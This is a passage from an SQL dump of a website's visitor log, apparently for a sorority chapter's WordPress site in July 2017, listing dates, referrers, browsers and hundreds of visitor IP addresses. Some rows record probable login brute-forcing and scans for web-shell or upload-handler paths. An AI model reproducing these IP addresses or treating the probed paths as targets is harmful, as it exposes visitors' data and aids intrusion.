Windows','46.0','','112.198.101.162','000',3,0),(7102,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','116.107.22.90','000',4,0),(7103,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','176.124.87.123','000',4,0),(7104,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','91EA','','181.201.186.78','000',3,0),(7105,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','195.174.81.96','000',3,0),(7106,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','175.158.216.62','000',1,0),(7107,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','41.150.249.72','000',3,0),(7108,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','196.25.64.98','000',1,0),(7109,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','24.41.207.194','000',8,0),(7110,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','46.152.106.231','000',5,0),(7111,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','36.81.45.252','000',2,0),(7112,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','203.165.148.32','000',1,0),(7113,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','130.43.59.183','000',5,0),(7114,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','160.177.40.113','000',1,0),(7115,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','36.77.187.6','000',5,0),(7116,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','41.242.137.52','000',2,0),(7117,'2017-07-09','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.21','000',10,0),(7118,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','191.116.45.27','000',5,0),(7119,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','183.82.181.170','000',5,0),(7120,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','202.129.251.83','000',2,0),(7121,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','217.24.159.98','000',1,0),(7122,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','109.185.189.63','000',3,0),(7123,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','109.96.11.233','000',3,0),(7124,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','115.178.216.95','000',1,0),(7125,'2017-07-09','http://zphiblgz.org','Firefox','Windows','49.0','','151.80.238.152','000',1,0),(7126,'2017-07-09','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7127,'2017-07-09','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.24','000',11,0),(7128,'2017-07-09','http://chatroulette.si/','MSIE','Unknown','7.0b','','46.118.124.89','000',1,0),(7129,'2017-07-09','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','192.126.96.23','000',1,0),(7130,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','85.74.253.158','000',1,0),(7131,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','197.0.2.122','000',2,0),(7132,'2017-07-09','http://zphiblgz.org/members/','Chrome','Windows','56.0.2924.87','','212.92.118.104','000',1,0),(7133,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','158.140.182.119','000',2,0),(7134,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','189.121.119.231','000',1,0),(7135,'2017-07-09','https://www.souvenirua.com/','MSIE','Windows','6.0','','46.118.125.174','000',5,0),(7136,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','195.205.36.144','000',2,0),(7137,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','177.237.28.164','000',2,0),(7138,'2017-07-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',2,0),(7139,'2017-07-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',31,0),(7140,'2017-07-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',38,0),(7141,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','50.4.40.149','000',1,0),(7142,'2017-07-09','http://perm-profnastil.ru/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(7143,'2017-07-09','http://dvervmoskvu.ru/','MSIE','Windows','6.0','','46.119.116.109','000',6,0),(7144,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','180.92.143.78','000',1,0),(7145,'2017-07-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(7146,'2017-07-09','http://zphiblgz.org/members/','Opera Next','Windows','44.0.2510.857','','212.92.117.25','000',1,0),(7147,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','103.36.18.20','000',2,0),(7148,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','87.214.165.216','000',1,0),(7149,'2017-07-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(7150,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','98.143.66.77','000',1,0),(7151,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','182.65.48.26','000',2,0),(7152,'2017-07-09','https://www.facebook.com/businesses.center/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7153,'2017-07-09','http://zphiblgz.org','Firefox','Windows','40.1','','202.9.42.213','000',2,0),(7154,'2017-07-10','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',2,0),(7155,'2017-07-10','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.137','000',1,0),(7156,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','91.140.91.30','000',1,0),(7157,'2017-07-10','http://zphiblgz.org','MSIE','Windows','6.0','','185.154.22.145','000',4,0),(7158,'2017-07-10','http://mebel-vstroika.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7159,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','90.66.33.174','000',1,0),(7160,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','103.212.156.84','000',1,0),(7161,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','212.79.110.69','000',1,0),(7162,'2017-07-10','http://khantymansiysk.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',5,0),(7163,'2017-07-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.131','000',2,0),(7164,'2017-07-10','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7165,'2017-07-10','https://lechenie-gemorroya.com/','MSIE','Windows','6.0','','46.118.117.158','000',2,0),(7166,'2017-07-10','http://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',34,0),(7167,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','103.48.111.70','000',1,0),(7168,'2017-07-10','http://zphiblgz.org','Faraday','Unknown','Unknown','','54.234.55.73','000',2,0),(7169,'2017-07-10','http://zphiblgz.org','Safari','Linux','538.1','','52.70.238.254','000',2,0),(7170,'2017-07-10','http://zphiblgz.org','Safari','Linux','538.1','','34.227.29.63','000',1,0),(7171,'2017-07-10','http://zphiblgz.org','Ruby','Unknown','Unknown','','54.234.55.73','000',2,0),(7172,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','208.96.112.16','000',2,0),(7173,'2017-07-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(7174,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','41.199.194.237','000',2,0),(7175,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','117.208.11.154','000',2,0),(7176,'2017-07-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',11,0),(7177,'2017-07-10','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.186','000',7,0),(7178,'2017-07-10','http://y8games-free.com/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(7179,'2017-07-10','http://www.bing.com/search?q=Lambda+Gamma+Zeta+Chapter,+Zeta+Phi+Beta+Sorority,+Inc.&src=IE-TopResult&FORM=IETR02&conversationid=','MSIE','Windows','11.0','','167.102.191.10','000',1,0),(7180,'2017-07-10','https://bpro1.top/','MSIE','Windows','6.0','','188.163.75.37','000',6,0),(7181,'2017-07-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','204.174.223.210','000',1,0),(7182,'2017-07-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.121.12.106','000',1,0),(7183,'2017-07-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','203.129.113.142','000',1,0),(7184,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','154.69.94.128','000',2,0),(7185,'2017-07-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(7186,'2017-07-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7187,'2017-07-10','http://zphiblgz.org','Chrome','Windows','15.0.874.121','','195.28.182.35','000',1,0),(7188,'2017-07-10','http://zphiblgz.org','Firefox','Windows','40.1','','189.123.98.135','000',1,0),(7189,'2017-07-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1478.Ft_dDZ0N-hYcxVlci4y4atzpAg6ko5NrkzSkT6ApfLXloSNnT1MQ22xoIMu0De-K.46ab534cb0ffe6b3f0d59f6d9d019b19d8cb3b94&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmpYTnpDb1YxSV9wR2RrVXptamZ5VkV5aW0yakx4QnRPVllkYUJDT0JYamc5WGRpaFZkeUpL&b64e=2&sign=d997a7b2c567d4f4394731ad894330ce&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrR3PhtqqmLVIJLwnEwPzBc1gXjP7ErhIWaa8VsFQl7Ov-31-Vls2i0tOxglC-j4tdrEogT4njjYwVMD5awjEud_IqeoeqKbiTLA9_tkoE9fwEhcPWs8yNm8QLbusOo3dT&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntD8lbx92akez4gWW9ukjB1xwUufJ0Bq43hPVB0YgKllIgdBBrUdwnVetvlG9lSifvg&l10n=ru&cts=1499731951806&mc=3.93486670364','Firefox','Windows','53.0','','188.255.16.224','000',1,0),(7190,'2017-07-10','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.169.26','000',4,0),(7191,'2017-07-10','http://google.com','Firefox','Windows','40.0','','206.180.171.149','000',1,0),(7192,'2017-07-10','http://zphiblgz.org','Firefox','Windows','53.0','','54.186.44.53','000',2,0),(7193,'2017-07-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',1,0),(7194,'2017-07-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.28','000',1,0),(7195,'2017-07-10','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.15','000',1,0),(7196,'2017-07-10','http://zphiblgz.org','Opera','Unknown','10.54','','185.125.216.38','000',1,0),(7197,'2017-07-10','http://zphiblgz.org','MSIE','Windows','9.0','','185.125.216.38','000',1,0),(7198,'2017-07-10','https://www.google.com/','Chrome','Windows','59.0.3071.115','','24.218.120.38','000',1,0),(7199,'2017-07-11','http://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',22,0),(7200,'2017-07-11','http://zphiblgz.org','Auto','Unknown','Unknown','','27.151.13.198','000',6,0),(7201,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','171.61.245.107','000',1,0),(7202,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','60.228.13.249','000',1,0),(7203,'2017-07-11','http://zphiblgz.org','MSIE','Windows','11.0','','144.217.116.154','000',2,0),(7204,'2017-07-11','http://videochat.ph/','MSIE','Windows','6.0','','46.119.116.109','000',1,0),(7205,'2017-07-11','http://zphiblgz.org','MSIE','Windows','9.0','','62.210.245.205','000',16,0),(7206,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','112.134.96.36','000',2,0),(7207,'2017-07-11','http://chatroulette.si/','MSIE','Windows','5.5','','46.118.124.89','000',2,0),(7208,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','89.211.240.86','000',1,0),(7209,'2017-07-11','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7210,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','151.45.129.132','000',2,0),(7211,'2017-07-11','http://zphiblgz.org','MSIE','Windows','9.0','','173.208.149.138','000',1,0),(7212,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','104.9.23.235','000',2,0),(7213,'2017-07-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.125','000',1,0),(7214,'2017-07-11','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.203.161','000',4,0),(7215,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(7216,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',1,0),(7217,'2017-07-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.116.12','000',1,0),(7218,'2017-07-11','http://www.zphiblgz.org/wp-content/upgrade/theme-compat/popup-pomo.php','Chrome','Windows','42.0.2311.152','','209.90.225.226','000',1,0),(7219,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',2,0),(7220,'2017-07-11','https://via-energy-order.com/','Opera','Windows','7.02','','46.119.116.109','000',2,0),(7221,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(7222,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.158.140','000',2,0),(7223,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(7224,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','95.90.206.99','000',1,0),(7225,'2017-07-11','http://remontvsamare.su/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(7226,'2017-07-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(7227,'2017-07-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(7228,'2017-07-11','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(7229,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(7230,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.88','000',2,0),(7231,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','145.239.74.47','000',2,0),(7232,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.51','000',2,0),(7233,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','71.167.147.213','000',2,0),(7234,'2017-07-11','http://dvervmoskvu.ru/','Unknown','Unknown','Unknown','','46.119.116.109','000',3,0),(7235,'2017-07-11','https://2000k.ru/','MSIE','Windows','5.5','','178.137.4.41','000',3,0),(7236,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(7237,'2017-07-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','82.211.19.143','000',1,0),(7238,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',1,0),(7239,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.142.15','000',2,0),(7240,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',2,0),(7241,'2017-07-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(7242,'2017-07-11','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.111.240','000',4,0),(7243,'2017-07-11','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.111.240','000',1,0),(7244,'2017-07-11','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.111.240','000',3,0),(7245,'2017-07-11','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.111.240','000',1,0),(7246,'2017-07-11','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.111.240','000',2,0),(7247,'2017-07-11','http://kirov.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',4,0),(7248,'2017-07-11','http://zphiblgz.org','Firefox','Windows','40.1','','189.6.234.32','000',1,0),(7249,'2017-07-11','http://zphiblgz.org/','Safari','Macintosh','10.1','','163.172.4.153','000',1,0),(7250,'2017-07-11','http://companies-catalog.com/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(7251,'2017-07-11','http://zphiblgz.org','Firefox','Windows','49.0','','91.223.82.156','000',1,0),(7252,'2017-07-11','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','138.197.111.51','000',2,0),(7253,'2017-07-12','https://venerologiya.com/','MSIE','Windows','6.0','','188.163.75.37','000',6,0),(7254,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.38.67','000',1,0),(7255,'2017-07-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(7256,'2017-07-12','http://zphiblgz.org','Auto','Unknown','Unknown','','27.151.13.198','000',6,0),(7257,'2017-07-12','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.137','000',1,0),(7258,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',1,0),(7259,'2017-07-12','https://bio-optomarket.ru/','Opera','Windows','9.0','','188.163.75.37','000',2,0),(7260,'2017-07-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7261,'2017-07-12','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7262,'2017-07-12','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7263,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',2,0),(7264,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','27.250.19.202','000',2,0),(7265,'2017-07-12','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(7266,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','41.200.203.2','000',1,0),(7267,'2017-07-12','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.150','000',1,0),(7268,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',2,0),(7269,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',2,0),(7270,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(7271,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(7272,'2017-07-12','http://www.zphiblgz.org/wp-content/upgrade/theme-compat/popup-pomo.php','Chrome','Windows','42.0.2311.152','','209.90.225.226','000',2,0),(7273,'2017-07-12','http://se-welding.ru/','Opera','Windows','7.54','','46.118.124.89','000',2,0),(7274,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','151.16.207.98','000',2,0),(7275,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','173.35.61.131','000',1,0),(7276,'2017-07-12','https://maslenka.kz/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(7277,'2017-07-12','http://zphiblgz.org','MSIE','Windows','9.0','','173.208.149.138','000',1,0),(7278,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','1.1.255.5','000',2,0),(7279,'2017-07-12','https://woweb.com.ua/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(7280,'2017-07-12','http://www.zphibmaryland.org/chapters/','Firefox','Windows','54.0','','158.72.91.68','000',12,0),(7281,'2017-07-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',13,0),(7282,'2017-07-12','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',7,0),(7283,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','213.205.198.131','000',1,0),(7284,'2017-07-12','http://zphiblgz.org','Firefox','Windows','53.0','','52.35.27.236','000',2,0),(7285,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','83.181.194.171','000',2,0),(7286,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','93.87.247.127','000',2,0),(7287,'2017-07-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.28','000',1,0),(7288,'2017-07-12','http://zphiblgz.org','Chrome','Linux','36.0.1989.12','','23.94.20.139','000',2,0),(7289,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','182.253.163.7','000',2,0),(7290,'2017-07-12','http://zphiblgz.org','Firefox','Windows','40.1','','177.134.222.64','000',2,0),(7291,'2017-07-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(7292,'2017-07-12','https://woweb.com.ua/','Opera','Windows','7.02','','46.119.116.109','000',3,0),(7293,'2017-07-13','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',7,0),(7294,'2017-07-13','http://chatroulette.online/','Opera','Windows','9.0','','46.118.124.89','000',3,0),(7295,'2017-07-13','http://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.144.221','000',2,0),(7296,'2017-07-13','http://zphiblgz.org/wp-includes/css/modules.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(7297,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','84.197.225.143','000',1,0),(7298,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.104.120.7','000',4,0),(7299,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.159.204','000',1,0),(7300,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','216.218.131.173','000',2,0),(7301,'2017-07-13','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','41.78.50.61','000',1,0),(7302,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','125.27.3.32','000',1,0),(7303,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','182.182.33.183','000',2,0),(7304,'2017-07-13','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','169.57.142.114','000',3,0),(7305,'2017-07-13','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7306,'2017-07-13','https://via-energy-acquistare.com/','MSIE','Windows','6.0','','46.119.116.109','000',4,0),(7307,'2017-07-13','http://stal-rulon.ru/','Unknown','Unknown','Unknown','','46.118.124.89','000',2,0),(7308,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','60.52.124.130','000',2,0),(7309,'2017-07-13','https://2000k.ru/','MSIE','Windows','4.01','','178.137.4.41','000',1,0),(7310,'2017-07-13','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',1,0),(7311,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','193.217.151.54','000',1,0),(7312,'2017-07-13','http://podshipniki-nsk.ru/','MSIE','Windows','5.5','','178.137.4.41','000',3,0),(7313,'2017-07-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(7314,'2017-07-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',4,0),(7315,'2017-07-13','https://www.google.com/','Firefox','Macintosh','54.0','','8.21.241.165','000',5,0),(7316,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',2,0),(7317,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','203.215.122.154','000',1,0),(7318,'2017-07-13','https://venerologiya.com/','MSIE','Windows','5.5','','188.163.75.37','000',2,0),(7319,'2017-07-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(7320,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','37.113.178.118','000',1,0),(7321,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.190.23','000',2,0),(7322,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','79.114.249.228','000',2,0),(7323,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','1.186.195.170','000',1,0),(7324,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','201.75.171.160','000',1,0),(7325,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.45.226.28','000',2,0),(7326,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.48.34.85','000',2,0),(7327,'2017-07-13','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',7,0),(7328,'2017-07-13','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7329,'2017-07-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.208.158.116','000',2,0),(7330,'2017-07-13','https://link.ac/','MSIE','Windows','6.0','','188.163.75.37','000',2,0),(7331,'2017-07-13','http://zphiblgz.org','Firefox','Windows','40.1','','119.152.132.190','000',2,0),(7332,'2017-07-13','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.19','000',1,0),(7333,'2017-07-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.22','000',1,0),(7334,'2017-07-14','http://free-gluten.ru/','MSIE','Windows','6.0','','188.163.75.37','000',5,0),(7335,'2017-07-14','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.18','000',1,0),(7336,'2017-07-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(7337,'2017-07-14','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',1,0),(7338,'2017-07-14','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7339,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','81.240.109.197','000',1,0),(7340,'2017-07-14','http://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(7341,'2017-07-14','http://zphiblgz.org','MSIE','Windows','8.0','','150.70.173.5','000',1,0),(7342,'2017-07-14','http://www.zphiblgz.org','MSIE','Windows','9.0','','159.203.103.134','000',3,0),(7343,'2017-07-14','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.103.134','000',5,0),(7344,'2017-07-14','http://zphiblgz.org','MSIE','Windows','10.0','','159.203.103.134','000',2,0),(7345,'2017-07-14','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','159.203.103.134','000',1,0),(7346,'2017-07-14','http://coolwallpapers-hd.com/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(7347,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','191.251.239.157','000',1,0),(7348,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','117.222.139.66','000',2,0),(7349,'2017-07-14','http://www.bing.com/search?q=gamma+zeta+chapter+of+zeta+phi+beta&go=Search&qs=bs&form=QBRE','MSIE','Windows','11.0','','12.206.27.110','000',1,0),(7350,'2017-07-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',2,0),(7351,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','39.40.194.189','000',2,0),(7352,'2017-07-14','https://xn--d1aifoe0a9a.top/','Unknown','Unknown','Unknown','','46.118.125.174','000',2,0),(7353,'2017-07-14','http://zphiblgz.org','Microsoft','Unknown','Unknown','','167.102.191.10','000',1,0),(7354,'2017-07-14','http://zphiblgz.org','MSIE','Windows','7.0','','167.102.191.10','000',1,0),(7355,'2017-07-14','http://zphiblgz.org','MSIE','Windows','11.0','','167.102.191.10','000',23,0),(7356,'2017-07-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(7357,'2017-07-14','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(7358,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','41.108.233.123','000',1,0),(7359,'2017-07-14','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','91.121.83.118','000',1,0),(7360,'2017-07-14','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','209.90.225.226','000',1,0),(7361,'2017-07-14','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7362,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','94.43.155.190','000',1,0),(7363,'2017-07-14','http://videochat.ph/','Unknown','Unknown','Unknown','','46.118.124.89','000',2,0),(7364,'2017-07-14','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',7,0),(7365,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','101.180.237.